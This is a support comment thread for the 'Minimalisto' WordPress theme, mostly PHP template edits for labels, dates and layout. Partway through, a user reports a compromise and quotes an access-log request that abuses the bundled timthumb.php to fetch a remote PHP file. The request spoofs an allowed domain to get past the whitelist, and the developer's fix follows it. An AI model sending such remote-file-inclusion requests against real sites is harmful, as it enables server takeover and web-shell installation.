Hi, nice theme! I’m using it here: www.elsidelrio.com.ar/galeria

I need to use this theme with Spanish texts so I have a few questions: 1. how do change “Latest from the blog” text in the homepage 2. How do I change date settings in home page thumbnails and meta_box? Months names are in English and it says “on July23,2012” though I’ve set date format as: day/month/year on Settings pannel 3. How do I remove “No comments” below the thumbnails in homepage 4. How do I remove the quote marks an Category from page-tile (i.e: ‘News’ Category) 5. when a post is displayed, the title shows duplicated: in the page title area and below the thumbnail. Can I hide this last one? 6. can I exclude categories to be shown in hempage? Thanks a lot!

Hi,

1) Find the words “Latest from the blog” in the file index.php from the main theme folder:

<h4><?php _e('Latest from the blog','minimalisto'); ?></h4>

2) In the same file index.php find this code:

<?php echo get_the_time('F j, Y'); ?>

and change it with:

<?php echo get_the_time('j/F/Y'); ?>

3) In the same file index.php find this code and delete it:

<li> - <a href="#"><?php comments_popup_link(__('No comments','minimalisto'),__('1 comment','minimalisto'), __('% comments','minimalisto')); ?></a></li>

4) Please send the page where you have the quotes.

5) Open the file single.php and find and delete this code:

<h2><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h2>

6) I do not see the categories in the homepage. Please send additional details.

Hello,

I am not sure if this is fixed in the newer version of this theme, but my VPS was compromised, and the vulnerability is a module used within this theme. The module “timthumb.php” is vulnerable to remote file inclusion. The following line was taken out of my access logs.

(/category/technology//wp-admin/themes/minimalisto/lib/timthumb.php?src=http://blogger.com.website499.com/byroe.php)

As you can see, the url where the exploit was hosted, included “blogger.com”. This is how they were able to bypass the URL check/verification within “timthumb.php”.

Please notify all of the people who purchased your theme so that they too do not end up with a webserver that is infected with a web shell, and used for DDoS, proxy, etc…

Hi,

You can make one change in the version that you have in the file /minimalisto/lib/timthumb.php

Find:

// external domains that are allowed to be displayed on your website
$allowedSites = array (
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
);

and replace with:

// external domains that are allowed to be displayed on your website
$allowedSites = array ( );

Of course I will make new update and will update the script version to newer.

For item#2 it still shows the month with name (July). Can I change it to number to make it multilanguaje (7)?

For item #4, the pages are cretaed by archive.php that collect category posts such as: http://www.elsidelrio.com.ar/galeria/?cat=6 http://www.elsidelrio.com.ar/galeria/?cat=5 http://www.elsidelrio.com.ar/galeria/?cat=1 On the page title is shown ‘Links? Category and I would like it to be just Links as title

For #6 the category that has to be excluded is Links, (cat number 1)

Sent you an email. I wanted to have a video as a post/portfolio featured image. I’ve added the video url link, but that is only for pretty photo which I’ve disabled so you have to view the actual post. I don’t want to embed the video onto the post/portfolio body. I’d rather have it like the featured images spot where you select “do not crop”. Is this possible? Thanks!

I have 2 questions -

1. When in a post category there is a heading which says “example category” how can i just have this display the name of the category minus the quotations and the word ‘category’ ie. instead of ‘Example’ Category it would just read

Example ?

2. I would like the posts and post category pages to be full width with no sidebar?

Hi,

1. To remove the “Category” and quotes, edit the file archive.php from the main theme folder and found this line:

‘<?php single_cat_title(); ?>’ <?php _e('Category','minimalisto'); ?>

and change it with this line:

<?php single_cat_title(); ?>

when I clik on page 2 It’s go there

(the right url is http://www.blabla.bla/category/take-me-out/page/2/)

My static front page is ‘blog’ , I only use the blog feature.

Slider Problems:

All of a sudden, the title text and description text has stopped appearing on any of the slides in my slider. I have tried deleting the all the slides and reentering them with new text but the issue persists. I have tried toggling the slider on/off on my homepage.

Any suggestions? Solutions?

Hi,

To display the slider in the homepage, add slides with featured images in Slider > Add New. To display only one static image, use the options from the Minimalisto Options > Slider > Use static Image and set the option Static Image URL .

Hi

Heart server team have got back to me and informed me of a serious issue with our site which is using the minimalisto theme, after greater inspection this is the email they have sent me

“Our admin team have had a look at the site, and I am afraid that they have found evidence of the site being compromised. It looks like the original crack occurred through the minimalisto theme that you have installed. Now that the site has been cracked there is no way of telling just how many files on the site are infected, and I am afraid that the only cure will be to clear the webspace, and perform a fresh installation of wordpress once this is done. I apologise for the inconvenience, but to reactivate the site with any files on it would only serve to allow the hack in again.”

have you come across anything like this before with your theme and can you help in anyway, we now have effectivley a dead web site

Unfortunately, it is not responsive. Yes, the theme works with MP3 plugins. Earlier, I had one support question about the MP3 plugin and worked fine.

1. Where (in whiche file) can I edit the text “Back to Home Page”?

2. How do I remove the wordpress links from the main page (Recents Comments, Login/Logout, Comments RSS , Entries RSS and so on).
